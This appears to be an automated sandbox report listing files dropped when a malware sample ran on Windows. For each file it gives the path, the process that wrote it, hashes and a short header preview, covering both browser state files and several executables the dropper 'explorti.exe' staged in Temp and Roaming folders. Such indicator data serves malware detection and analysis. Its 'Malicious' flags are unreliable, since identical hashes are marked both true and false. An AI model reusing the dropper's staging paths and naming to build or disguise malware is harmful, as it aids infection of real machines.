Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c46a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090729405485079
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMGwuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEU6Btbz8hu3VlXr4CRo1
MD5:	D136B83C0F72AC109E58F4D5BB1D4DAF
SHA1:	3E4C7365937F5797567CD1DBE17607A7EF7C21DA
SHA-256:	9706D4E0647DE69899B4149F58E571E631ACA77A7D991B38A3E5871FE90DA9DF
SHA-512:	D036600D52E8C0D1A1B73DAD1017CAA2FC56630680B9C4A6E9816C6C6E7113BE6440362C52537619BE5E3177F7B059BEA6C468064B214CB128A7C0C6A41FF86B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0018238520723782249
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zET:/M/xT02z8
MD5:	AC81EF9540AC3DDCC4546B82AC3801BD
SHA1:	1AC27855FABFA8AF62752DA91E2A6EADC815CBBC
SHA-256:	4A2C8BA05BE86A2182B9BCC9AEC916588CC9502F4F505CD79991AF8326EC11E4
SHA-512:	D27635D446F0AEA20E138F96BEDEDF118CCF0BC8560CB2E11AB0AACE9D320E989164E2971DAB20571A9B6D9A1B4A52CAAF78084D2141372D77516F52ABD222AB
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
MD5:	265DB1C9337422F9AF69EF2B4E1C7205
SHA1:	3E38976BB5CF035C75C9BC185F72A80E70F41C2E
SHA-256:	7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
SHA-512:	3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b6700f8a-842c-41d7-a3bf-913721a7e572.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44672
Entropy (8bit):	6.095491078328179
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkB0wuZhDO6vP6OYQG8gQ3i9P8fvFIwEcGoup1Xl3j0:z/Ps+wsI7yOEd64QBg9chu3VlXr4CRo1
MD5:	D59EADC6D0D07A6B38BFF05136C43014
SHA1:	6FBD56169570D73586030295BD3674CCD2446E79
SHA-256:	F6E671EF241F944261B708BE1421D5F0B054C8EC9DD25AA5086F5E0D6F976BAE
SHA-512:	96D94F8408C9E41EEC16FBC190EE8A87A81900EE233DD7462DCC33C642134AE19FFF27FAB1B59E5CCD5E89741A95130F9DFF6C5ED1E083E5725D50406EE0B157
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c75b832f-7437-4486-8e52-188f28f7b745.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44673
Entropy (8bit):	6.095502643516643
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkB0FuZhDO6vP6OYQG8gQbi9P8fvFIwEcGoup1Xl3j0:z/Ps+wsI7yOEg64QBgJchu3VlXr4CRo1
MD5:	73F63022A11CA4BB6596FD9BCA51BE75
SHA1:	C49E69B66F67A3C4F9E988DA7AD0DDFFB0AB08A7
SHA-256:	108117479CBB79379AB34CC497A76B3B315B3EA9BD0C2E29660E6FA262E92988
SHA-512:	847327D7EC067F4D5BA13E20735D364554209738059BA505FE77D4F8A089AD919EA315C08DF81F75F9D3D47B9444286A09BE3A1654F0CCD65B6A1B724AB0CA49
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8423269033375695
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxLxl9Il8ud8N+vV1nXkuXL/w9y2TEd1rc:mKYgN+vVlkuXLow2X
MD5:	7EC3D8379F5587304453C19F06218C21
SHA1:	5DFCEDB1FD0DB82D919D8C96D4684CEC392B839B
SHA-256:	25D29DAEB185E57531530788B4F89144CF2324F1AAB9EB48F26498CE6C2F50D0
SHA-512:	9D41E48A5209088E0A58DDEF99A7234C2590EED4F0FE42B7D4E200247D71BFBF81D2FA014B15F59BD435E7C7F8632BECA4BCE958E122CBDA3132BF718942AE56
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.E.F.3.v.i./.8.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.d.H.I.W.j.T.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.998676660433352
Encrypted:	false
SSDEEP:	96:2YgWgYFeaFOl026285mGmU5aaztpaopNwJaIx9MSUR:2+neaFO+t/m65aaz1jsdx9eR
MD5:	94974A97D65E1D0C3F9D9F4C0EFFE53D
SHA1:	34D6008C5AB4ACF9E56223CF65A78D803C84CE93
SHA-256:	F13650861FF1982D8888E608EB73D0CA45ECD968B412BE306FB32B20610DF298
SHA-512:	B7DAE1D63F45BA84A9A62898600054B56FABB92F3566736AE819E07BB3FD713B425D5848FF8A20D290716AD8EF801717E1980CD57B6634E14BF31558A57F0B66
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".J.c.t.2.p.C.f.8.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.d.H.I.W.j.T.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	917504
Entropy (8bit):	6.579773417412227
Encrypted:	false
SSDEEP:	12288:tqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgacT0:tqDEvCTbMWu7rQYlBQcBiT6rprG8as0
MD5:	769C5CA33FE0D7003A0C686CDCFB9021
SHA1:	69809F09C0335F63D5CB4BFD519FA85E6742CFD7
SHA-256:	9FA59291CDE45D6FFD9A82B5AA314AB7B2F56A78523F0E946AE3295A62627E5E
SHA-512:	CD8B8FB214BD851AA02C5E9DED40F2D739B17B42B7F8D730D87489459BCA9D614CEC824F8A1F6BB7DFC1D4488B4F8778DC21066B1CE18F1E30C7FC65FBA6C638
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......f.........."..........P......w.............@..........................`......V.....@...@.......@.....................d...\|....@..........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc.......@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1771008
Entropy (8bit):	7.942401968532579
Encrypted:	false
SSDEEP:	49152:JfvwDkhoI7r1lAOv4gNKuP8xy7Ir4maBVSI5:JfoDglvwS8x2IrKC
MD5:	3D7BB337FEC6E0587CB2AC31BBD4780A
SHA1:	3C0DC6EB3A68DE74C53EC41C83ABF386C060B134
SHA-256:	4410CA8B0BB2EC305F4AFFF8DDB215B9ABF29475C37CCB54C725A87EEC23E582
SHA-512:	80D099760185F8AF5FEE093782BEE7559675733873559629391ADBB91ADF4CFF60A1776624F183FDB7A550710EEBEDDDD0C7E35AB9F7EF6BD6C851495E500600
Malicious:	false
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B"......0g...........@..........................`g......O....@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... ..)...$......N..............@...ylafldxq......M......P..............@...tgmwlthu..... g.....................@....taggant.0...0g.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1897472
Entropy (8bit):	7.94898857819984
Encrypted:	false
SSDEEP:	24576:qm6Rswplivqsyvw7qUle/LSzcBS1qWkvcIsVGfFCKD2/jI6iUqjY3Hd5/Zwjd4sD:qm0RL16Ln1gFCv3ewHzDdJ
MD5:	573679635B5F2712201843AB58C3C313
SHA1:	4DF58145FC9034226D108AB2BC3C1C3DAF89432E
SHA-256:	9BB28003CC59DC408C7EB6CE0ACDDE2DF74FB0E17D0B5ABC9E075BDE50C90E83
SHA-512:	FE783AB248F785F90968F3DC55579C018C7229B35302A0ED1AD4BCF6C67B802496C269A805AB38A13AFFE01590D14F626C0B063430BA77F6411002049B045204
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................J...........@...........................K...........@.................................W...k.............................J.............................\.J..................................................... . ............................@....rsrc...............................@....idata ............................@... .@*.........................@...mtwfurbd......0.....................@...tfjhxtwu......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	917504
Entropy (8bit):	6.579773417412227
Encrypted:	false
SSDEEP:	12288:tqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgacT0:tqDEvCTbMWu7rQYlBQcBiT6rprG8as0
MD5:	769C5CA33FE0D7003A0C686CDCFB9021
SHA1:	69809F09C0335F63D5CB4BFD519FA85E6742CFD7
SHA-256:	9FA59291CDE45D6FFD9A82B5AA314AB7B2F56A78523F0E946AE3295A62627E5E
SHA-512:	CD8B8FB214BD851AA02C5E9DED40F2D739B17B42B7F8D730D87489459BCA9D614CEC824F8A1F6BB7DFC1D4488B4F8778DC21066B1CE18F1E30C7FC65FBA6C638
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......f.........."..........P......w.............@..........................`......V.....@...@.......@.....................d...\|....@..........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc.......@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1880
Entropy (8bit):	5.3941568586139
Encrypted:	false
SSDEEP:	48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrd:8e2Fa116uCntc5toYd
MD5:	6F23EE351D5AE94C639B2DBE8519821B
SHA1:	C6B19E766C1DFFE121E10239BC94A5A3EBA7FE19
SHA-256:	6618023F6A69B24F1F02B875DFE7A78F18D3B346FEDDEAEAB48F62934E330968
SHA-512:	1C83876B0CDF48304D382960E1E056E967F3DF5A812E92CF0019AEFC5C3A59BF46035B54177426493E0C0DC924DC45C9E8920D559E98DDF7A4DA33DDE1153B23
Malicious:	false
Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1771008
Entropy (8bit):	7.942401968532579
Encrypted:	false
SSDEEP:	49152:JfvwDkhoI7r1lAOv4gNKuP8xy7Ir4maBVSI5:JfoDglvwS8x2IrKC
MD5:	3D7BB337FEC6E0587CB2AC31BBD4780A
SHA1:	3C0DC6EB3A68DE74C53EC41C83ABF386C060B134
SHA-256:	4410CA8B0BB2EC305F4AFFF8DDB215B9ABF29475C37CCB54C725A87EEC23E582
SHA-512:	80D099760185F8AF5FEE093782BEE7559675733873559629391ADBB91ADF4CFF60A1776624F183FDB7A550710EEBEDDDD0C7E35AB9F7EF6BD6C851495E500600
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B"......0g...........@..........................`g......O....@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... ..)...$......N..............@...ylafldxq......M......P..............@...tgmwlthu..... g.....................@....taggant.0...0g.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1771008
Entropy (8bit):	7.942401968532579
Encrypted:	false
SSDEEP:	49152:JfvwDkhoI7r1lAOv4gNKuP8xy7Ir4maBVSI5:JfoDglvwS8x2IrKC
MD5:	3D7BB337FEC6E0587CB2AC31BBD4780A
SHA1:	3C0DC6EB3A68DE74C53EC41C83ABF386C060B134
SHA-256:	4410CA8B0BB2EC305F4AFFF8DDB215B9ABF29475C37CCB54C725A87EEC23E582
SHA-512:	80D099760185F8AF5FEE093782BEE7559675733873559629391ADBB91ADF4CFF60A1776624F183FDB7A550710EEBEDDDD0C7E35AB9F7EF6BD6C851495E500600
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B"......0g...........@..........................`g......O....@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... ..)...$......N..............@...ylafldxq......M......P..............@...tgmwlthu..... g.....................@....taggant.0...0g.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\875a60a09683c344.customDestinations-ms (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	3888
Entropy (8bit):	3.5282850421585885
Encrypted:	false
SSDEEP:	48:th8EKGTdOPP+isJTrBzBdLXuHGkDpHh82ABfdOPcisJTrBzngdLXuHGk+21:tOI3umkDRfUnIumkz
MD5:	6F2A8B09F9268E9809E0F016E91A42F0
SHA1:	8FB9053EA54D253C9A1A6C99B994A43B77B7FD43
SHA-256:	BD2E2BDC7055357DEACF2E987ECD1A0913D0CA78503A07BF4EB4AB8FF021E238
SHA-512:	7561E5765E88105979DD14FDC817DF6439FBAE21C8C817B06CD40AC2E22FC11F4F8ED3C5EC1AAA6900108FD6570D1D4D58E220FD17C0E93B0DECB84E0DB0E7A9
Malicious:	false
Preview:	...................................FL..................F.@.. .....\|.K......]'....?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....DW.r..PROGRA~2.........O.IDW.r....................V......LU.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....DW.r..MICROS~1..D......(Ux.!Y.#..............................M.i.c.r.o.s.o.f.t.....N.1.....CWaa0.Edge..:.......S8.DWUl...........................s..E.d.g.e.....`.1.....CWaa0.APPLIC~1..H.......S8.!Y.#..............................A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.!Y.#....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j..............j.....C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. 